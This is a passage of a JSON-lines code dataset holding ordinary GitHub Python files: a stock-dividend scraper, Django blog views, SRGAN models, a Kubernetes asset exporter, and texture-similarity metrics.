t.find_all('tr'):\n\t\t\tcols = row.find_all('td')\n\t\t\tif len(cols) != 0:\n\t\t\t\tdate_str = cols[0].div.text.strip()\n\t\t\t\tcount_str = cols[1].div.text.strip()[:-2]\n\t\t\t\tdata.append({'date':convert_date(date_str), 'count':float(re.sub(r'[^0-9.]', '', count_str))})\n\t\t\t\torig.append(cols)\n\treturn data, orig\n\ndef get_total_stocks(date, stocks_data):\n\tcount = 0.0\n\tfor item in stocks_data:\n\t\tif date < item['date']:\n\t\t\tbreak\n\t\telse:\n\t\t\tcount = item['count']\n\treturn count\n\t\ndef get_divend(code):\n\tdivend_data, divend_orig = get_divend_data(code)\n\tdelay()\n\tstocks_data, stocks_orig = get_total_stock_data(code)\n\t\n\tcurrent_year = 0\n\tfor i in range(len(divend_data)-1, -1, -1):\n\t\trecord = divend_data[i]\n\t\treg_date = record['register']\n\t\t\n\t\tyear_in_record = reg_date.year\n\t\tif current_year == year_in_record:\n\t\t\trecord['year'] = year_in_record\n\t\telse:\n\t\t\trecord['year'] = year_in_record - 1\n\t\tcurrent_year = year_in_record\n\t\t\n\t\trecord['total'] = get_total_stocks(reg_date, stocks_data)\n\treturn divend_data, stocks_data\n\ndef load_AB_list(filename):\n\tfull_dict = {}\n\twith open(filename, encoding='UTF-8') as csvfile:\n\t\treader = csv.reader(csvfile)\n\t\tfor row in reader:\n\t\t\tkey = row[0]\n\t\t\tdata = {'code_a':row[1], 'name_a':row[2], 'code_b':row[3], 'name_b':row[4]}\n\t\t\tfull_dict[key] = data\n\treturn full_dict\n\t\ndef load_divend_done_list(filename):\n\tdone_set = set()\n\ttry:\n\t\twith open('no_record.txt') as afile:\n\t\t\tfor line in afile.readlines():\n\t\t\t\tkey = line.strip()\n\t\t\t\tif key not in done_set:\n\t\t\t\t\tdone_set.add(key)\n\texcept:\n\t\tpass\n\t\t\n\ttry:\n\t\twith open('divend.csv') as csvfile:\n\t\t\treader = csv.reader(csvfile)\n\t\t\tfor row in reader:\n\t\t\t\tkey = row[0]\n\t\t\t\tif key not in done_set:\n\t\t\t\t\tdone_set.add(key)\n\t\t\t\t\t#print('already had', key)\n\texcept:\n\t\tpass\n\treturn done_set\n\t\nif __name__ == '__main__':\n\tno_record_file = 'no_record.txt'\n\tdivend_csv = 'divend.csv'\n\tfull_dict = 
load_AB_list('full_list.csv')\n\tdone_set = load_divend_done_list(divend_csv)\n\ttotal = len(full_dict)\n\tdone = len(done_set)\n\tfor code in full_dict:\n\t\tif code in done_set:\n\t\t\tcontinue\n\t\ttry:\n\t\t\tdivend_data, stocks_data = get_divend(code)\n\t\texcept:\n\t\t\t# raise\n\t\t\tprint('Get data from the url failed')\n\t\t\tcontinue\n\t\tdone += 1\n\t\tif len(divend_data) > 0:\n\t\t\twith open(divend_csv, 'a') as outfile:\n\t\t\t\tfor record in divend_data:\n\t\t\t\t\ttext = '%s,%s,%s,%s,%s\\n' % (code, record['total'], record['divend'], record['year'], record['register'].date().isoformat())\n\t\t\t\t\toutfile.write(text)\n\t\telse:\n\t\t\twith open(no_record_file, 'a') as outfile:\n\t\t\t\toutfile.write(code + '\\n')  # was `output.write`, a NameError: the handle is `outfile`\n\t\tprint('Progress ... [%d/%d] done' % (done, total))\n\t\tdone_set.add(code)\n\t\tdelay()","repo_name":"jerrymarx/PythonFinanceStudy","sub_path":"scraping_divend/stock_info_sina_getter.py","file_name":"stock_info_sina_getter.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"29742760841","text":"import json\nfrom handlers.user import facebook, twitter, tumblr, flickr, px500, linkedin\n\nclass BaseProviderWrapper(object):\n    # map used to format blob for UI templates\n    provider_map = {\n        'facebook': facebook,\n        'twitter': twitter,\n        'tumblr': tumblr,\n        'flickr': flickr,\n        '500px': px500,\n        'linkedin': linkedin,\n    }\n\n    @staticmethod\n    def get_provider_from_link(link):\n        p = link.split(':')[0]\n        return p\n\n    def add_link(self, link, raw, strip_token=True):\n        \"\"\"\n        adds a linked account with all sub accounts to \"accounts\" blob used by UI templates\n        @param link: link key in format provider:user_id\n        @param raw: raw provider specific account data\n        @return: True or False\n        \"\"\"\n        # get provider name\n        p = self.get_provider_from_link(link)\n        if not (p and p in self.provider_map.keys()):\n            return None\n\n        # load raw user data\n        user_data = json.loads(raw) if raw else None\n        if not user_data:\n            return None\n\n        # normalize user data\n        account = self.provider_map[p].UserData.populate(user_data)\n        if not account:\n            return None\n\n        if strip_token:\n            account.pop('token', None)\n\n        return account\n\n    def is_token_refresh(self, provider):\n        \"\"\"\n        Returns true if token refresh is required for this provider\n        @param provider:\n        @return: True or False\n        \"\"\"\n        return self.provider_map[provider].UserData.is_token_refresh()\n\nclass ProviderWrapper(BaseProviderWrapper):\n    # map used to format blob for UI templates\n    short_provider_map = {\n        'facebook': 'fb',\n        'twitter': 'tw',\n        'tumblr': 'tr',\n        'flickr': 'fr',\n        '500px': '5p',\n        'linkedin': 'in',\n    }\n\n    @staticmethod\n    def get_long_provider_name(short_name):\n        # iterate the short-name map; the inherited provider_map maps names to modules,\n        # so comparing its values against a short name could never match\n        for ln, sn in ProviderWrapper.short_provider_map.iteritems():\n            if sn == short_name:\n                return ln.capitalize()\n\n        # return same if not found\n        return short_name\n\n    def __init__(self, data, sources, include_unlinked=False):\n        super(ProviderWrapper, self).__init__()\n\n        self.data = data\n        # pre populate destination accounts data structure passed to UI templates\n        self.accounts = {k: list() for k in self.short_provider_map.values()}\n        self.include_unlinked = include_unlinked\n        self.sources = sources\n\n    def purge_sources(self, account):\n        \"\"\"\n        Removes redundant sources from the accounts\n        @param account: provider account, must have ['sources']\n        @return:\n        \"\"\"\n        return set.intersection(set(account['sources']), self.sources)\n\n    def get_accounts(self):\n        return 
self.accounts\n\n def add_link(self, link, raw, strip_token=True):\n p = link.split(':')[0]\n if not (p and p in self.short_provider_map.keys()):\n return None\n\n h = self.short_provider_map[p]\n\n a = super(ProviderWrapper, self).add_link(link, raw)\n if not a:\n return None\n\n # fill accounts record with sources and options\n self.data.populate_provider_bag(p, a, a['id'])\n\n # remove empty sources unless special case\n if not self.include_unlinked:\n a['sources'] = list(self.purge_sources(a))\n\n # append the accounts list\n self.accounts[h].append(a)\n\n def populate_linked_accounts(self, gid):\n linked = self.data.get_linked_accounts(gid) or dict()\n for link, raw in linked.iteritems():\n self.add_link(link, raw)\n","repo_name":"mutabot/magenta","sub_path":"svc/handlers/provider_wrapper.py","file_name":"provider_wrapper.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44005162453","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\nvertices = range(1, 10)\nedges = [(7, 2), (2, 3), (7, 4), (4, 5), (7, 3), (7, 5), (1, 6), (1, 7), (2, 8), (2, 9)]\nG = nx.Graph()\nG.add_nodes_from(vertices)\nG.add_edges_from(edges)\nnx.draw(G, with_labels=True)\nplt.show()\n\nstopien_centralnosci = nx.degree_centrality(G)\nprint(stopien_centralnosci)\n\nposrednictwo = nx.betweenness_centrality(G)\nprint(posrednictwo)\n\nbliskosc = nx.closeness_centrality(G)\nprint(bliskosc)\n\ncentrality = nx.eigenvector_centrality(G)\nprint(centrality)\n\n","repo_name":"Kamil-Radzimowski/algorithms","sub_path":"chapter-2-graphs/indicator.py","file_name":"indicator.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9569084504","text":"\n\nfrom django.shortcuts import redirect, render\nfrom django.contrib.auth import login ,logout , authenticate\n\n#forms\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom appblog.forms import *\n\nfrom appblog.models import *\n\n#log\n\nfrom django.contrib.auth.decorators import login_required\n\n\n\ndef sobre_mi(request):\n return render(request ,\"appblog/sobremi.html\")\n\ndef login_request(request):\n if request.method == \"POST\":\n formulario=AuthenticationForm(request, data= request.POST) \n if formulario.is_valid():\n data=formulario.cleaned_data\n nombre_user=data.get('username') \n contraseña= data.get('password')\n\n usuario= authenticate( username=nombre_user, password=contraseña) \n \n if usuario is not None: \n \n login(request, usuario) \n \n contexto={\"user\":usuario}\n \n return redirect(\"inicio\")\n else: \n contex= {\"errors\":[\"el usuario no existe\"]}\n return render (request, \"appblog/index.html\", contex)\n else:\n contex= {\"errors\":[\"revise los datos indicados\"]}\n return render (request, \"appblog/index.html\", contex)\n\n else:\n form= AuthenticationForm()\n return render(request, \"appblog/login.html\",{\"form\":form})\n\n\ndef register(request):\n if request.method == \"POST\":\n form= registrousuario(request.POST)\n\n if form.is_valid():\n usuario=form.cleaned_data.get(\"username\")\n print(usuario)\n form.save()\n \n return render(request, \"appblog/index.html\")\n \n else:\n context={\"errors\": [\"no paso validaciones\"]}\n return render(request ,\"appblog/index.html\", context)\n else:\n form = registrousuario()\n return render (request , \"appblog/register.html\" ,{\"form\": form})\n\n \ndef inicio(request):\n \n 
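# if someone is logged in, fetch their avatar so the home template can display it\n    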
if request.user.username:\n avatar = Avatar.objects.filter(usuario=request.user)\n\n if len(avatar) > 0:\n imagen = avatar[0].imagen.url\n else:\n imagen = None\n \n \n else:\n imagen = None\n dict_ctx = {\"title\": \"Inicio\", \"page\": \"Inicio\", \"imagen_url\": imagen}\n return render(request, \"appblog/index.html\", dict_ctx)\n \n \n\n@ login_required()\ndef cargar_imagen(request):\n\n if request.method == \"POST\":\n formulario= AvatarFormulario(request.POST,request.FILES)\n\n if formulario.is_valid():\n usuario1= request.user\n avatar= Avatar.objects.filter(usuario=usuario1)\n\n if len(avatar) > 0:\n avatar= avatar[0]\n avatar.imagen= formulario.cleaned_data[\"imagen\"]\n avatar.save()\n\n else:\n avatar = Avatar(usuario=usuario1, imagen=formulario.cleaned_data[\"imagen\"])\n avatar.save()\n \n return redirect(\"inicio\")\n else:\n\n formulario = AvatarFormulario()\n return render(request, \"appblog/cargar_imagen.html\", {\"form\": formulario})\n\n\n\n \n\n@login_required()\ndef actualizar_usuario(request):\n return render(request, \"appblog/editar_usuario.html\")\n\n\n\n\n\n@login_required()\ndef actualizar_usuario(request):\n \n usuario= request.user\n\n if request.method == \"POST\":\n formulario= UsuarioEditForm(request.POST) \n\n if formulario.is_valid():\n \n data= formulario.cleaned_data\n\n usuario.email= data[\"email\"]\n usuario.password1= data[\"password1\"]\n usuario.password2= data[\"password2\"]\n usuario.first_name= data[\"first_name\"]\n usuario.last_name= data[\"last_name\"]\n \n\n usuario.save()\n\n return redirect(\"inicio\")\n \n else:\n formulario= UsuarioEditForm(initial={\"email\": usuario.email, \"first_name\": usuario.first_name ,\"last_name\": usuario.last_name}) \n return render(request, \"appblog/editar_usuario.html\", {\"form\": formulario, \"errors\": [\"Datos o formato invalidos\"]})\n\n else:\n formulario= UsuarioEditForm(initial={\"email\": usuario.email, \"first_name\": usuario.first_name ,\"last_name\": usuario.last_name}) \n return render(request, \"appblog/editar_usuario.html\", {\"form\": formulario})\n\n\n\n\n\n\n","repo_name":"nicoymas/proyectoblog","sub_path":"appblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11106489351","text":"\nimport torch\nimport torch.nn as nn\nimport numpy as np\n\ndef get_activation(name, inplace=True):\n if name == 'relu': return nn.ReLU(inplace)\n if name == 'lrelu': return nn.LeakyReLU(0.2, inplace=inplace)\n if name == 'prelu': return nn.PReLU()\n if name == 'sigmoid': return nn.Sigmoid()\n if name == 'tanh': return nn.Tanh()\n\ndef get_normalization(name, channels):\n if name == 'bn': return nn.BatchNorm2d(channels)\n if name == 'in': return nn.InstanceNorm2d(channels)\n\ndef _support_sn(sn, layer):\n if sn: return nn.utils.spectral_norm(layer)\n return layer\n\ndef Conv2d(sn, *args, **kwargs):\n layer = nn.Conv2d(*args, **kwargs)\n return _support_sn(sn, layer)\ndef Linear(sn, *args, **kwargs):\n layer = nn.Linear(*args, **kwargs)\n return _support_sn(sn, layer)\ndef ConvTranspose2d(sn, *args, **kwargs):\n layer = nn.ConvTranspose2d(*args, **kwargs)\n return _support_sn(sn, layer)\n\nclass Res(nn.Module):\n def __init__(self, module):\n super().__init__()\n self.module = module\n def forward(self, x):\n h = self.module(x)\n return (h + x) / np.sqrt(2)\n\nclass Block(nn.Module):\n def __init__(self,\n channels,\n sn=True, bias=True, norm_name='in', act_name='prelu'\n ):\n 
super().__init__()\n self.block = nn.Sequential(\n get_normalization(norm_name, channels),\n get_activation(act_name),\n Conv2d(sn, channels, channels, 3, 1, 1, bias=bias),\n get_normalization(norm_name, channels),\n get_activation(act_name),\n Conv2d(sn, channels, channels, 3, 1, 1, bias=bias)\n )\n def forward(self, x):\n return self.block(x)\n\nclass Up(nn.Module):\n def __init__(self,\n in_channels, out_channels,\n sn=True, bias=True, act_name='prelu'\n ):\n super().__init__()\n self.up = nn.Sequential(\n get_activation(act_name),\n Conv2d(sn, in_channels, out_channels*4, 3, 1, 1, bias=bias),\n nn.PixelShuffle(2)\n )\n def forward(self, x):\n return self.up(x)\n\nclass Generator(nn.Module):\n def __init__(self,\n scale, image_channels=3, channels=64, num_blocks=5,\n sn=True, bias=True, norm_name='in', act_name='prelu'\n ):\n super().__init__()\n num_ups = int(np.log2(scale))\n\n self.input = Conv2d(\n sn, image_channels, channels, 7, 1, 3\n )\n blocks = []\n for _ in range(num_blocks):\n blocks.append(\n Res(Block(\n channels, sn, bias,\n norm_name, act_name\n ))\n )\n blocks.extend([\n get_normalization(norm_name, channels),\n get_activation(act_name),\n Conv2d(sn, channels, channels, 3, 1, 1, bias=bias)\n ])\n self.res_blocks = Res(\n nn.Sequential(*blocks)\n )\n ups = []\n for _ in range(num_ups):\n ups.append(\n Up(\n channels, channels,\n sn, bias, act_name\n )\n )\n self.ups = nn.Sequential(*ups)\n self.output = nn.Sequential(\n get_activation(act_name),\n Conv2d(sn, channels, image_channels, 7, 1, 3, bias=bias),\n get_activation('tanh')\n )\n def forward(self, x):\n x = self.input(x)\n x = self.res_blocks(x)\n x = self.ups(x)\n x = self.output(x)\n return x\n\nclass SingleScaleDiscriminator(nn.Module):\n def __init__(self,\n in_channels, num_layers=3, channels=32,\n sn=True, bias=True, norm_name='in', act_name='lrelu', \n ):\n super().__init__()\n\n ochannels = channels\n layers = [\n nn.Sequential(\n Conv2d(sn, in_channels, ochannels, 4, 2, 1, bias=bias),\n get_activation(act_name)\n )\n ]\n for _ in range(num_layers):\n layers.append(\n nn.Sequential(\n Conv2d(sn, channels, channels*2, 4, 2, 1, bias=bias),\n get_normalization(norm_name, channels*2),\n get_activation(act_name)\n )\n )\n channels *= 2\n layers.append(\n Conv2d(sn, channels, 1, 4, 1, 1, bias=bias)\n )\n self.disc = nn.ModuleList(layers)\n def forward(self, x):\n out = []\n for module in self.disc:\n x = module(x)\n out.append(x)\n return out[-1], out[:-1]\n\nclass Discriminator(nn.ModuleList):\n def __init__(self,\n in_channels=3, num_scale=2, num_layers=3, channels=32,\n sn=True, bias=True, norm_name='in', act_name='lrelu'\n ):\n super().__init__()\n\n self.discs = nn.ModuleList()\n for _ in range(num_scale):\n self.discs.append(\n SingleScaleDiscriminator(\n in_channels, num_layers, channels,\n sn, bias, norm_name, act_name\n )\n )\n self.down = nn.AvgPool2d(2)\n def forward(self, x):\n out = []\n for module in self.discs:\n out.append(module(x))\n x = self.down(x)\n return out\n\ndef init_weight_N002(m):\n if isinstance(m, nn.Conv2d):\n m.weight.data.normal_(0, 0.02)\n if not m.bias == None:\n m.bias.data.fill_(0.)\n elif isinstance(m, nn.BatchNorm2d):\n if not m.weight == None:\n m.weight.data.fill_(1.)\n m.bias.data.fill_(0.)\n\ndef init_weight_xavier(m):\n if isinstance(m, nn.Conv2d):\n nn.init.xavier_normal_(m.weight)\n if not m.bias == None:\n m.bias.data.fill_(0.)\n elif isinstance(m, nn.BatchNorm2d):\n if not m.weight == None:\n m.weight.data.fill_(1.)\n m.bias.data.fill_(0.)\n\ndef 
init_weight_kaiming(m):\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n if not m.bias == None:\n m.bias.data.fill_(0.)\n elif isinstance(m, nn.BatchNorm2d):\n if not m.weight == None:\n m.weight.data.fill_(1.)\n m.bias.data.fill_(0.)","repo_name":"STomoya/animeface","sub_path":"implementations/SRGAN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"5"} +{"seq_id":"19249404581","text":"import time\nimport logging\nfrom kubernetes import client, config\nfrom pprint import pprint\nimport yaml\nimport os\nimport requests, json\nimport warnings\nimport urllib3, urllib \nfrom urllib3.exceptions import InsecureRequestWarning\n\nconfig.load_incluster_config()\n\nv1 = client.CoreV1Api()\n\nKUBE_LABEL_SELECTOR = os.environ[\"LABEL_SELECTOR\"]\nKUBE_ANNOTATION_ASSET_IDENTIFIER = \"asset-repository/asset.identifier\"\nKUBE_ANNOTATION_VERSION = \"asset-repository/version\"\nKUBE_ANNOTATION_CONTAINERS = \"asset-repository/container-instances\"\n\n\ndef extractContainerInfos(container, baseIdentifier, commonAttributes, annotations):\n info = dict()\n\n image = container.image\n imageVersion = image.split(':')\n if imageVersion[1]:\n info[\"version\"] = imageVersion[1]\n else:\n info[\"version\"] = image\n\n info[\"name\"] = container.name\n info[\"identifier\"] = baseIdentifier + \"-\" + container.name\n info[\"attributes\"] = commonAttributes\n\n container_asset_identifier = KUBE_ANNOTATION_ASSET_IDENTIFIER + \".\" + container.name\n\n # Asset: use annotation container-specific\n if container_asset_identifier in annotations:\n info[\"asset\"] = dict()\n info[\"asset\"][\"identifier\"] = annotations[container_asset_identifier]\n elif KUBE_ANNOTATION_ASSET_IDENTIFIER in annotations:\n info[\"asset\"] = dict()\n info[\"asset\"][\"identifier\"] = annotations[KUBE_ANNOTATION_ASSET_IDENTIFIER]\n\n return info\n\n\ndef kube():\n instances = []\n\n pods = v1.list_pod_for_all_namespaces(watch=False, label_selector=KUBE_LABEL_SELECTOR)\n\n for pod in pods.items:\n namespace = pod.metadata.namespace\n nodeName = pod.spec.node_name\n podName = pod.metadata.name\n annotations = pod.metadata.annotations\n\n commonAttributes = dict()\n commonAttributes[\"pod\"] = podName\n commonAttributes[\"node\"] = nodeName\n commonAttributes[\"namespace\"] = namespace\n\n baseIdentifier = namespace + \"-\" + podName\n\n if not annotations:\n annotations = dict()\n\n # If containers to check are identified in annotations\n if KUBE_ANNOTATION_CONTAINERS in annotations:\n trackedContainerName = annotations[KUBE_ANNOTATION_CONTAINERS].split(\",\")\n for container in pod.spec.containers:\n if container.name in trackedContainerName:\n containerInstance = extractContainerInfos(container, baseIdentifier, commonAttributes, annotations)\n instances.append(containerInstance)\n else:\n for container in pod.spec.containers:\n containerInstance = extractContainerInfos(container, baseIdentifier, commonAttributes, annotations)\n instances.append(containerInstance)\n \n return instances\n\nwhile True:\n instances = kube()\n \n warnings.simplefilter('ignore',InsecureRequestWarning)\n\n headers = {\n 'Content-type': 'application/json',\n }\n \n json_data = {\n 'instances': instances,\n }\n\n try:\n response = requests.put(os.environ[\"ASSET_REPOSITORY_URL\"] + \"/sources/\" + os.environ[\"SOURCE_IDENTIFIER\"] + \"/instances\", headers=headers, json=json_data, verify=False)\n response.raise_for_status()\n except 
requests.exceptions.HTTPError as e:\n raise SystemExit(e)\n except requests.exceptions.RequestException as e: # This is the correct syntax\n raise SystemExit(e)\n\n time.sleep(int(os.environ[\"SLEEP\"]))\n","repo_name":"beerfranz/asset-repository-kube-exporter","sub_path":"src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24632713281","text":"import clr\nimport time\nimport os\nimport platform\nimport fnmatch\nimport shutil\nfrom xml.etree import ElementTree as ET\nfrom xml.etree.ElementTree import fromstring\nfrom xml.etree.ElementTree import Element\n\nclr.AddReference(\"System\")\nfrom System.Text import *\nfrom System.IO import *\n\nclass log():\n\tdef __init__(self, path):\n\t\tself.path = path\n\t\tif path != '':\n\t\t\tlog_file = open(self.path, 'w')\n\n\tdef write(self, text, result):\n\t\tif result == 0:\n\t\t\tresult = 'done'\n\t\telif result == 1:\n\t\t\tresult = 'none'\n\t\tlog_current_time = time.strftime('%Y-%m-%d-%H:%M:%S',time.localtime(time.time()))\n\t\tstream_writer = StreamWriter(self.path, True);\n\t\ttext = log_current_time + \" >> \" + text + ': ' + result.ToString();\n\t\tprint(text);\n\t\tstream_writer.WriteLine(text);\n\t\tstream_writer.Close();\n\t\t# log_current_time = time.strftime('%Y-%m-%d-%H:%M:%S',time.localtime(time.time()))\n\t\t# log_file = open(self.path, 'a')\n\t\t# text = log_current_time + ' >> ' + text + ': ' + str(result) + '\\n'\n\t\t# print text\n\t\t# log_file.write(text)\n\t\t# log_file.close()\n\nclass case_info():\n\tdef __init__(self, result_file_path = '', iterate_num = 0, case_id = '', \n\t\tresult = 0, comments = '', run_time = 0):\n\t\tself.iterate_num = iterate_num\n\t\tself.case_id = case_id\n\t\tself.result = result\n\t\tself.comments = comments\n\t\tself.run_time = run_time\n\t\tself.result_file_path = result_file_path","repo_name":"shonwang/auto_click","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31555137575","text":"import numpy as np\n\nimport cv2\nimport os\n\nfrom abc import ABC, abstractmethod\nfrom collections import Counter\nfrom numpy.linalg import inv\nfrom scipy.stats import entropy\n\nfrom scipy.spatial.distance import mahalanobis\nfrom skimage import color\nfrom skimage.feature import local_binary_pattern\n\nfrom sklearn.model_selection import StratifiedKFold\nfrom utils import filterbank, metric\n\n\ndef _filter_class_counts(image_dir, class_cnt, fold_cnt, scale_invariance=False):\n fold_cnt = min(fold_cnt, class_cnt)\n img_class_files = {}\n for root, dir, files in os.walk(image_dir):\n for fpath in files:\n img_class, scale = fpath.split(\"-\")\n if scale_invariance:\n scale = scale.split(\"_\", 3)[1]\n img_class = \".\".join([img_class, scale])\n if img_class not in img_class_files:\n img_class_files[img_class] = [os.path.join(root, fpath)]\n elif len(img_class_files[img_class]) < class_cnt or class_cnt == -1:\n img_class_files[img_class].append(os.path.join(root, fpath))\n img_classes = set(img_class_files.keys())\n for img_class in img_classes:\n if (len(img_class_files[img_class]) < fold_cnt) or (class_cnt > 0 and img_class in\n img_class_files and len(img_class_files[img_class]) < class_cnt):\n del img_class_files[img_class]\n print(\n f\"Filtered data to {len(img_class_files.keys())} classes of size {class_cnt}\")\n return 
img_class_files\n\n\nclass TextureFeature(ABC):\n def __init__(self, image_dir_or_saved_bin, class_cnt, save_features, scale_invariance=False,\n fold_cnt=5):\n self.labels, self.features = self.load_or_generate_features(\n image_dir_or_saved_bin, class_cnt, fold_cnt, scale_invariance, save_features)\n self.validator = StratifiedKFold(n_splits=fold_cnt, shuffle=True).split(\n self.features, self.labels)\n\n def load_or_generate_features(self, image_dir_or_saved_features, class_cnt, fold_cnt,\n scale_invariance, save_features):\n if os.path.isfile(image_dir_or_saved_features):\n return np.load(image_dir_or_saved_features)\n\n img_class_files = _filter_class_counts(\n image_dir_or_saved_features, class_cnt, fold_cnt, scale_invariance)\n img_labels, img_features = [], []\n for img_class, files in img_class_files.items():\n for fpath in files:\n single_feature = self.generate_feature(fpath)\n img_labels.append(img_class)\n img_features.append(single_feature)\n if save_features:\n np.savez(open(save_features, 'wb'), img_labels, img_features)\n return img_labels, img_features\n\n @abstractmethod\n def generate_feature(self, fpath):\n pass\n\n @abstractmethod\n def compute_similarity(self, feature_1, feature_2):\n pass\n\n\nclass Ssim(TextureFeature):\n def __init__(self, image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt=5, k_range=(0.01, 0.03), L=255):\n self.k_range = k_range\n self.luminance = L\n self.c1 = (k_range[0] * L) ** 2\n self.c2 = (k_range[1] * L) ** 2\n tmp_window = metric.fspecial()\n self.window = tmp_window/tmp_window.sum()\n super().__init__(image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt)\n\n def generate_feature(self, fpath):\n source_image = cv2.imread(fpath, cv2.IMREAD_GRAYSCALE)\n mu = metric.conv(source_image, self.window)\n sigma_squared = metric.conv(\n source_image * source_image, self.window) - mu ** 2\n return mu, sigma_squared, fpath\n\n def compute_similarity(self, feature_1, feature_2):\n img1 = cv2.imread(feature_1[2], cv2.IMREAD_GRAYSCALE).astype(float)\n img2 = cv2.imread(feature_2[2], cv2.IMREAD_GRAYSCALE).astype(float)\n sigma_12 = metric.conv(img1 * img2, self.window) - \\n feature_1[0] * feature_2[0]\n ssim_map = ((2*feature_1[0] * feature_2[0] + self.c1) * (2*sigma_12 + self.c2)) / (\n (feature_1[0] ** 2 + feature_2[0] ** 2 + self.c1) *\n (feature_1[1] + feature_2[1] + self.c2))\n return ssim_map.mean()\n\n\nclass Stsim1(TextureFeature):\n def generate_feature(self, fpath):\n steerable_filter = filterbank.Steerable()\n source_image = cv2.imread(fpath, cv2.IMREAD_GRAYSCALE)\n steerable_pyramid = steerable_filter.getlist(\n steerable_filter.buildSCFpyr(source_image))\n return steerable_pyramid\n\n def compute_similarity(self, 
feature_1, feature_2):\n np.mean([metric.pooling(feature_1[i], feature_2[i])\n for i in range(len(feature_1))])\n\n\nclass Stsim2(TextureFeature):\n def generate_feature(self, fpath):\n source_image = cv2.imread(fpath, cv2.IMREAD_GRAYSCALE)\n\n steerable_filter = filterbank.Steerable()\n steerable_pyramid = steerable_filter.getlist(\n steerable_filter.buildSCFpyr(source_image))\n\n steerable_filter_nosubbands = filterbank.SteerableNoSub()\n steerable_crossterms = steerable_filter_nosubbands.buildSCFpyr(\n source_image)\n return steerable_pyramid, steerable_crossterms\n\n def compute_similarity(self, feature_1, feature_2):\n # Base STSIM-1 pooled metrics\n stsim2 = [metric.pooling(feature_1[0][i], feature_2[0][i])\n for i in range(len(feature_1[0]))]\n\n # Across scale, same orientation\n for scale in range(2, len(feature_1[1]) - 1):\n for orient in range(len(feature_1[1][1])):\n im11 = np.abs(feature_1[1][scale - 1][orient])\n im12 = np.abs(feature_1[1][scale][orient])\n\n im21 = np.abs(feature_2[1][scale - 1][orient])\n im22 = np.abs(feature_2[1][scale][orient])\n stsim2.append(metric.compute_cross_term(\n im11, im12, im21, im22, 7).mean())\n\n # Across orientation, same scale\n for scale in range(2, len(feature_1[1]) - 1):\n for orient in range(len(feature_1[1][1])):\n im11 = np.abs(feature_1[1][scale][orient])\n im21 = np.abs(feature_2[1][scale][orient])\n\n for orient2 in range(orient + 1, len(feature_1[1][1])):\n im13 = np.abs(feature_1[1][scale][orient2])\n im23 = np.abs(feature_2[1][scale][orient2])\n stsim2.append(metric.compute_cross_term(\n im11, im13, im21, im23, 7).mean())\n return np.mean(stsim2)\n\n\nclass StsimC(TextureFeature):\n def __init__(self, image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt=5, mahalanobis_file=None, mahalanobis_type=\"cov\", scope=\"intraclass\",\n aca_color_cnt=0, color_dir=\"\"):\n self.mahalanobis_file = mahalanobis_file\n self.mahalanobis_type = mahalanobis_type\n self.scope = scope\n self.aca_color_cnt = aca_color_cnt\n self.color_dir = color_dir\n self.mahalanobis_matrix = None\n super().__init__(image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt)\n\n def compute_similarity(self, feature_1, feature_2):\n return mahalanobis(feature_1, feature_2, inv(self.mahalanobis_matrix))\n\n def generate_feature(self, fpath):\n vec = list(metric.Metric().STSIM_M(\n cv2.imread(fpath, cv2.IMREAD_GRAYSCALE)))\n if self.aca_color_cnt:\n pixel_cnt = Counter()\n base_name = os.path.splitext(os.path.basename(fpath))[0]\n color_path = os.path.join(self.color_dir, base_name + '_lav.png')\n img_lab = color.rgb2lab(cv2.imread(color_path))\n for i in range(len(img_lab)):\n for j in range(len(img_lab[i])):\n pixel_cnt[tuple(img_lab[i][j])] += 1\n\n color_features = [i[0]\n for i in pixel_cnt.most_common(self.aca_color_cnt)]\n if len(color_features) < self.aca_color_cnt:\n color_features.extend(\n [(0, 0, 0) for i in range(self.aca_color_cnt - len(color_features))])\n color_features = [\n val for color_idx in color_features for val in color_idx]\n vec += color_features\n return vec\n\n def compute_mahalanobis_matrix(self, train_split):\n if self.mahalanobis_file and os.path.exists(self.mahalanobis_file):\n self.mahalanobis_matrix = np.load(self.mahalanobis_file)\n return\n class_matrix, train_features = [], []\n class_means = {}\n for img_class in set(self.labels):\n img_features = []\n for train_idx in train_split:\n if self.labels[train_idx] == img_class:\n img_features.append(self.features[train_idx])\n # 
